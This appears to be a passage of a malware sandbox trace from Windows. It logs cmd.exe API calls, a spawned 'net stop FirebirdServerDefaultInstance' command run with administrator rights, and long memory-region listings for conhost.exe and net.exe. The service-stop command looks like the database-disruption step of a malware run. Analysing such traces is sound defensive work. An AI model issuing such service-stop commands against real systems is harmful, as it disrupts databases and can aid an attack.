_wcsicmp (_String1="net", _String2="SET") returned -5 [0125.802] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0125.802] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0125.802] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0125.802] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0125.802] _wcsicmp (_String1="net", _String2="MD") returned 1 [0125.802] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0125.802] _wcsicmp (_String1="net", _String2="RD") returned -4 [0125.803] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0125.803] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0125.803] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0125.803] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0125.803] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0125.803] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0125.803] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0125.803] _wcsicmp (_String1="net", _String2="VER") returned -8 [0125.803] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0125.803] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0125.803] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0125.803] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0125.803] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0125.803] _wcsicmp (_String1="net", _String2="START") returned -5 [0125.803] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0125.803] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0125.803] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0125.803] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0125.803] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0125.803] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0125.803] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0125.803] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0125.803] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0125.803] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0125.803] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0125.803] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0125.803] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0125.803] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0125.803] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0125.803] _wcsicmp (_String1="net", _String2="CD") returned 11 [0125.803] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0125.803] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0125.803] _wcsicmp (_String1="net", _String2="REN") returned -4 [0125.803] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0125.803] _wcsicmp (_String1="net", _String2="SET") returned -5 [0125.803] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0125.803] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0125.803] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0125.803] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0125.803] _wcsicmp (_String1="net", _String2="MD") returned 1 [0125.803] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0125.803] _wcsicmp (_String1="net", _String2="RD") returned -4 [0125.803] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0125.803] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0125.803] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0125.803] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0125.803] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0125.803] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0125.803] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0125.803] _wcsicmp (_String1="net", _String2="VER") returned -8 [0125.803] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0125.803] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0125.803] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0125.803] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0125.803] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0125.804] _wcsicmp (_String1="net", _String2="START") returned -5 [0125.804] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0125.804] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0125.804] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0125.804] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0125.804] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0125.804] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0125.804] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0125.804] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0125.804] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0125.804] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0125.804] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0125.804] _wcsicmp (_String1="net", _String2="IF") returned 5 [0125.804] _wcsicmp (_String1="net", _String2="REM") returned -4 [0125.804] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0125.804] SetErrorMode (uMode=0x0) returned 0x0 [0125.804] SetErrorMode (uMode=0x1) returned 0x0 [0125.804] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x51d05d0, lpFilePart=0x516f2c4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x516f2c4*="Desktop") returned 0x1d [0125.804] SetErrorMode (uMode=0x0) returned 0x1 [0125.804] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0125.804] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0125.812] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0125.812] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0125.812] GetConsoleTitleW (in: lpConsoleTitle=0x516f544, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0125.813] InitializeProcThreadAttributeList (in: lpAttributeList=0x516f470, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x516f454 | out: lpAttributeList=0x516f470, lpSize=0x516f454) returned 1 [0125.813] UpdateProcThreadAttribute (in: lpAttributeList=0x516f470, dwFlags=0x0, Attribute=0x60001, lpValue=0x516f45c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x516f470, lpPreviousValue=0x0) returned 1 [0125.813] GetStartupInfoW (in: lpStartupInfo=0x516f4a8 | out: lpStartupInfo=0x516f4a8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0125.813] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0125.813] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0125.814] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop FirebirdServerDefaultInstance", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x516f3f8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop FirebirdServerDefaultInstance", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x516f444 | out: lpCommandLine="net stop FirebirdServerDefaultInstance", lpProcessInformation=0x516f444*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x764, dwThreadId=0x454)) returned 1 [0125.925] CloseHandle (hObject=0xa4) returned 1 [0125.926] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0125.926] GetEnvironmentStringsW () returned 0x51d9ef8* [0125.926] FreeEnvironmentStringsA (penv="=") returned 1 [0125.926] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0126.797] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x516f3dc | out: lpExitCode=0x516f3dc*=0x2) returned 1 [0126.797] CloseHandle (hObject=0xa8) returned 1 [0126.797] _vsnwprintf (in: _Buffer=0x516f4c4, _BufferCount=0x13, _Format="%08X", _ArgList=0x516f3e4 | out: _Buffer="00000002") returned 8 [0126.797] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0126.797] GetEnvironmentStringsW () returned 0x51db360* [0126.797] FreeEnvironmentStringsA (penv="=") returned 1 [0126.797] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0126.797] GetEnvironmentStringsW () returned 0x51db360* [0126.797] FreeEnvironmentStringsA (penv="=") returned 1 [0126.797] DeleteProcThreadAttributeList (in: lpAttributeList=0x516f470 | out: lpAttributeList=0x516f470) [0126.797] _get_osfhandle (_FileHandle=1) returned 0x3c [0126.798] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0126.798] _get_osfhandle (_FileHandle=1) returned 0x3c [0126.798] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0126.798] _get_osfhandle (_FileHandle=0) returned 0x38 [0126.798] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0126.798] SetConsoleInputExeNameW () returned 0x1 [0126.798] GetConsoleOutputCP () returned 0x1b5 [0126.798] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0126.798] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.798] exit (_Code=2) Thread: id = 356 os_tid = 0x5c0 Process: id = "86" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3cb34000" os_pid = "0xb1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "85" os_parent_pid = "0x300" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5461 start_va = 0x7f032000 end_va = 0x7f032fff entry_point = 0x0 region_type = private name = "private_0x000000007f032000" filename = "" Region: id = 5462 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5463 start_va = 0xf9d2590000 end_va = 0xf9d25affff entry_point = 0x0 region_type = private name = "private_0x000000f9d2590000" filename = "" Region: id = 5464 start_va = 0xf9d25b0000 end_va = 0xf9d25c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f9d25b0000" filename = "" Region: id = 5465 start_va = 0xf9d25d0000 end_va = 0xf9d260ffff entry_point = 0x0 region_type = private name = "private_0x000000f9d25d0000" filename = "" Region: id = 5466 start_va = 0x7df5ffa00000 end_va = 0x7ff5ff9fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffa00000" filename = "" Region: id = 5467 start_va = 0x7ff6c4590000 end_va = 0x7ff6c45b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4590000" filename = "" Region: id = 5468 start_va = 0x7ff6c45b9000 end_va = 0x7ff6c45b9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45b9000" filename = "" Region: id = 5469 start_va = 0x7ff6c45be000 end_va = 0x7ff6c45bffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45be000" filename = "" Region: id = 5470 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 5471 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5472 start_va = 0xf9d2630000 end_va = 0xf9d272ffff entry_point = 0x0 region_type = private name = "private_0x000000f9d2630000" filename = "" Region: id = 5473 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5474 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5475 start_va = 0xf9d2590000 end_va = 0xf9d259ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f9d2590000" filename = "" Region: id = 5476 start_va = 0xf9d25a0000 end_va = 0xf9d25a6fff entry_point = 0x0 region_type = private name = "private_0x000000f9d25a0000" filename = "" Region: id = 5477 start_va = 0xf9d2610000 end_va = 0xf9d2610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f9d2610000" filename = "" Region: id = 5478 start_va = 0xf9d2620000 end_va = 0xf9d262ffff entry_point = 0x0 region_type = private name = "private_0x000000f9d2620000" filename = "" Region: id = 5479 start_va = 0xf9d2730000 end_va = 0xf9d27edfff entry_point = 0xf9d2730000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5480 start_va = 0xf9d27f0000 end_va = 0xf9d282ffff entry_point = 0x0 region_type = private name = "private_0x000000f9d27f0000" filename = "" Region: id = 5481 start_va = 0xf9d2830000 end_va = 0xf9d2836fff entry_point = 0x0 region_type = private name = "private_0x000000f9d2830000" filename = "" Region: id = 5482 start_va = 0xf9d2840000 end_va = 0xf9d29c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f9d2840000" filename = "" Region: id = 5483 start_va = 0xf9d29d0000 end_va = 0xf9d2b50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f9d29d0000" filename = "" Region: id = 5484 start_va = 0xf9d2b60000 end_va = 0xf9d3f5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f9d2b60000" filename = "" Region: id = 5485 start_va = 0xf9d3f60000 end_va = 0xf9d3f60fff entry_point = 0x0 region_type = private name = "private_0x000000f9d3f60000" filename = "" Region: id = 5486 start_va = 0xf9d3f70000 end_va = 0xf9d3f70fff entry_point = 0x0 region_type = private name = "private_0x000000f9d3f70000" filename = "" Region: id = 5487 start_va = 0x7ff6c4490000 end_va = 0x7ff6c458ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4490000" filename = "" Region: id = 5488 start_va = 0x7ff6c45bc000 end_va = 0x7ff6c45bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45bc000" filename = "" Region: id = 5489 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 5490 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 5491 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5492 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5493 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5494 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5495 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5496 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5497 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5498 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5499 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5500 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 353 os_tid = 0x834 Thread: id = 354 os_tid = 0xb30 Thread: id = 355 os_tid = 0x53c Process: id = "87" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x3c7bb000" os_pid = "0x764" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "85" os_parent_pid = "0x300" cmd_line = "net stop FirebirdServerDefaultInstance" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5514 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 5515 start_va = 0xb30000 end_va = 0x4b2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 5516 start_va = 0x4b30000 end_va = 0x4b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 5517 start_va = 0x4b50000 end_va = 0x4b51fff entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 5518 start_va = 0x4b60000 end_va = 0x4b73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b60000" filename = "" Region: id = 5519 start_va = 0x4b80000 end_va = 0x4bbffff entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 5520 start_va = 0x4bc0000 end_va = 0x4c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004bc0000" filename = "" Region: id = 5521 start_va = 0x4c40000 end_va = 0x4c43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c40000" filename = "" Region: id = 5522 start_va = 0x4c50000 end_va = 0x4c50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c50000" filename = "" Region: id = 5523 start_va = 0x4c60000 end_va = 0x4c61fff entry_point = 0x0 region_type = private name = "private_0x0000000004c60000" filename = "" Region: id = 5524 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5525 start_va = 0x7f520000 end_va = 0x7f542fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f520000" filename = "" Region: id = 5526 start_va = 0x7f544000 end_va = 0x7f544fff entry_point = 0x0 region_type = private name = "private_0x000000007f544000" filename = "" Region: id = 5527 start_va = 0x7f54a000 end_va = 0x7f54afff entry_point = 0x0 region_type = private name = "private_0x000000007f54a000" filename = "" Region: id = 5528 start_va = 0x7f54d000 end_va = 0x7f54ffff entry_point = 0x0 region_type = private name = "private_0x000000007f54d000" filename = "" Region: id = 5529 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5530 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5531 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 5532 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5533 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 5534 start_va = 0x4d60000 end_va = 0x4d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d60000" filename = "" Region: id = 5535 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5536 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5537 start_va = 0x4f10000 end_va = 0x500ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f10000" filename = "" Region: id = 5538 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5539 start_va = 0x4b30000 end_va = 0x4b3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b30000" filename = "" Region: id = 5540 start_va = 0x4b40000 end_va = 0x4b43fff entry_point = 0x0 region_type = private name = "private_0x0000000004b40000" filename = "" Region: id = 5541 start_va = 0x4c70000 end_va = 0x4d2dfff entry_point = 0x4c70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5542 start_va = 0x4d70000 end_va = 0x4daffff entry_point = 0x0 region_type = private name = "private_0x0000000004d70000" filename = "" Region: id = 5543 start_va = 0x4db0000 end_va = 0x4e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004db0000" filename = "" Region: id = 5544 start_va = 0x4e30000 end_va = 0x4e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e30000" filename = "" Region: id = 5545 start_va = 0x4e70000 end_va = 0x4eeffff entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 5546 start_va = 0x50e0000 end_va = 0x50effff entry_point = 0x0 region_type = private name = 